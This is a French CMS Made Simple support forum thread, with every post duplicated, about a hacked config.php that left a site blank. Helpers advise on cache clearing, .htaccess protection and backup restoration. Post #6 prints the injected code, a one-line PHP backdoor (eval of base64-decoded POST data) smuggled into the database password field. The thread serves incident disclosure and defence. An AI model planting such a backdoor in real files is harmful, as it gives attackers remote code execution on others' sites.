[Résolu] Hack du fichier de config possible

Note de ce sujet :
  • Moyenne : 0 (0 vote(s))
  • 1
  • 2
  • 3
  • 4
  • 5
#1
Citation :#~~~~~ DEBUT BLOC A NE PAS SUPPRIMER ~~~~~
#~ Version du CMS: -1.11.12
#~ Url du site : www.bric-france.com
#~ Hébergeur / Soft : OVH
#~ Informations Système :
#~ Cms Version: 1.11.12
#~ Installed Modules:
#~ CMSMailer: 5.2.2
#~ CMSPrinting: 1.0.5
#~ FileManager: 1.4.5
#~ MenuManager: 1.8.6
#~ MicroTiny: 1.2.8
#~ ModuleManager: 1.5.8
#~ News: 2.14.4
#~ Search: 1.7.11
#~ ThemeManager: 1.1.8
#~ TinyMCE: 2.9.12
#~ FormBuilder: 0.8.1.1
#~~~~~ FIN BLOC A NE PAS SUPPRIMER ~~~~~



Bonjour,

J'ai eu un problème sur un site et je voulais vous en faire part, en voulant aller sur mon site www.bric-france.com ce dernier était inaccessible, une simple page blanche, impossible de me connecter sur l'admin également. En cherchant un peu j'ai vu que mon fichier config.php avait été changé et des lignes de code bizare étaient à la place des paramêtres normaux. Je pense donc que qqun a réussi à modifier ce fichier pour tenter je ne sais pas trop quoi.


J'ai réussi à remettre le site en place en effectuant une réinstalle complète sans écraser la base de donnée. Depuis mon site reste bloqué sur la page index.php alors que toute mon arobrescence est bien présente dans mon admin ?

Est ce que quelqu'un a déjà eu ce type de problème ?

Merci à vous.
#1
Citation :#~~~~~ DEBUT BLOC A NE PAS SUPPRIMER ~~~~~
#~ Version du CMS: -1.11.12
#~ Url du site : www.bric-france.com
#~ Hébergeur / Soft : OVH
#~ Informations Système :
#~ Cms Version: 1.11.12
#~ Installed Modules:
#~ CMSMailer: 5.2.2
#~ CMSPrinting: 1.0.5
#~ FileManager: 1.4.5
#~ MenuManager: 1.8.6
#~ MicroTiny: 1.2.8
#~ ModuleManager: 1.5.8
#~ News: 2.14.4
#~ Search: 1.7.11
#~ ThemeManager: 1.1.8
#~ TinyMCE: 2.9.12
#~ FormBuilder: 0.8.1.1
#~~~~~ FIN BLOC A NE PAS SUPPRIMER ~~~~~



Bonjour,

J'ai eu un problème sur un site et je voulais vous en faire part, en voulant aller sur mon site www.bric-france.com ce dernier était inaccessible, une simple page blanche, impossible de me connecter sur l'admin également. En cherchant un peu j'ai vu que mon fichier config.php avait été changé et des lignes de code bizare étaient à la place des paramêtres normaux. Je pense donc que qqun a réussi à modifier ce fichier pour tenter je ne sais pas trop quoi.


J'ai réussi à remettre le site en place en effectuant une réinstalle complète sans écraser la base de donnée. Depuis mon site reste bloqué sur la page index.php alors que toute mon arobrescence est bien présente dans mon admin ?

Est ce que quelqu'un a déjà eu ce type de problème ?

Merci à vous.
#2
Citation :mon site reste bloqué sur la page index.php alors que toute mon arobrescence est bien présente dans mon admin
Vider le cache du CMS et du navigateur déjà

et protéger le config avec un .htaccess

# Empecher de lire ou accéder au fichier config.php
<Files config.php>
order allow,deny
deny from all
</Files>
J-C Etiemble v 2.2.xx
#2
Citation :mon site reste bloqué sur la page index.php alors que toute mon arobrescence est bien présente dans mon admin
Vider le cache du CMS et du navigateur déjà

et protéger le config avec un .htaccess

# Empecher de lire ou accéder au fichier config.php
<Files config.php>
order allow,deny
deny from all
</Files>
J-C Etiemble v 2.2.xx
#3
On peut aussi mettre ses droits à 404
MS-Dos, Gem, geoworks, Windows 1, 2, 3, 3.1, 95, 98, XP, seven, 8, 10 Smile
Mac system 1 à 6
Wampserver 3.1.9,
PhP 7.3.5,
CMS version 2.2.11
#3
On peut aussi mettre ses droits à 404
MS-Dos, Gem, geoworks, Windows 1, 2, 3, 3.1, 95, 98, XP, seven, 8, 10 Smile
Mac system 1 à 6
Wampserver 3.1.9,
PhP 7.3.5,
CMS version 2.2.11
#4
Si tu t'es fait pirater comme cela en a tout l'air, tu ne peux plus avoir confiance ni dans ta bd (login et mot de passe dans le config.php), ni dans tes fichiers.
Tu dois d'abord supprimer tous les fichiers de tous les dossiers du site avant de faire l'installation complète.
Le plus simple serais de remettre les backups d'OVH (fichiers et bd) en vérifiant tout d'abord tes logs serveurs pour avoir la date exacte du hack.
#4
Si tu t'es fait pirater comme cela en a tout l'air, tu ne peux plus avoir confiance ni dans ta bd (login et mot de passe dans le config.php), ni dans tes fichiers.
Tu dois d'abord supprimer tous les fichiers de tous les dossiers du site avant de faire l'installation complète.
Le plus simple serais de remettre les backups d'OVH (fichiers et bd) en vérifiant tout d'abord tes logs serveurs pour avoir la date exacte du hack.
#5
Bonjour à vous, effectivement je n'avais pas pensé à faire le backup de chez OVH, je suis sur que c'est un hack c'est bien la première fois que cela m'arrive sur un site cmsms. J'espère que la restauration sera efficace, dans ce cas je fermerai le post, sinon je reviendrai vers vous car je n'arrive toujours pas à régler mon problème de lien qui pointent tous sur la page d'accueil.
#5
Bonjour à vous, effectivement je n'avais pas pensé à faire le backup de chez OVH, je suis sur que c'est un hack c'est bien la première fois que cela m'arrive sur un site cmsms. J'espère que la restauration sera efficace, dans ce cas je fermerai le post, sinon je reviendrai vers vous car je n'arrive toujours pas à régler mon problème de lien qui pointent tous sur la page d'accueil.
#6
Voila le code qui était sur le fichier de config.

Code :
[== PHP ==]
$config['dbms'] = 'mysqli';
$config['db_hostname'] = '209.59.130.213';
$config['db_username'] = 'er';
$config['db_password'] = '';eval(base64_decode($_POST['a1']));exit;//';
$config['db_name'] = 'error';
$config['db_prefix'] = '';
$config['timezone'] = '';
$config['query_var'] = '';
#6
Voila le code qui était sur le fichier de config.

Code :
[== PHP ==]
$config['dbms'] = 'mysqli';
$config['db_hostname'] = '209.59.130.213';
$config['db_username'] = 'er';
$config['db_password'] = '';eval(base64_decode($_POST['a1']));exit;//';
$config['db_name'] = 'error';
$config['db_prefix'] = '';
$config['timezone'] = '';
$config['query_var'] = '';
#7
voir forum EN Suddenly: Blank empty white page only – https??

est-ce que le dossiers install existait sur ton site ?
J-C Etiemble v 2.2.xx
#7
voir forum EN Suddenly: Blank empty white page only – https??

est-ce que le dossiers install existait sur ton site ?
J-C Etiemble v 2.2.xx
#8
Le problème s'est reglé en effectuant une nouvelle réinstallation, oui j'avais oublié Sad de renommer le fichier d'install du coup je l'ai carrément supprimé. Je pense que le Hack modifie seulement le fichier de config mais rien d'autre car tout à l'air ok pour le reste. J'ai modifié également les droits sur le fichier de config.

Merci en tout cas pour votre aide et votre réactivité.
#8
Le problème s'est reglé en effectuant une nouvelle réinstallation, oui j'avais oublié Sad de renommer le fichier d'install du coup je l'ai carrément supprimé. Je pense que le Hack modifie seulement le fichier de config mais rien d'autre car tout à l'air ok pour le reste. J'ai modifié également les droits sur le fichier de config.

Merci en tout cas pour votre aide et votre réactivité.
#9
Citation :oui j'avais oublié sad de renommer le fichier d'insta
voir le liens donnés plus haut en particulier it is this exploit

Un des avantages de la V2 c'est qu'il n'y a pas de dossier install, mais il y des règles de sécurité à respecter
J-C Etiemble v 2.2.xx
#9
Citation :oui j'avais oublié sad de renommer le fichier d'insta
voir le liens donnés plus haut en particulier it is this exploit

Un des avantages de la V2 c'est qu'il n'y a pas de dossier install, mais il y des règles de sécurité à respecter
J-C Etiemble v 2.2.xx


Atteindre :


Utilisateur(s) parcourant ce sujet : 1 visiteur(s)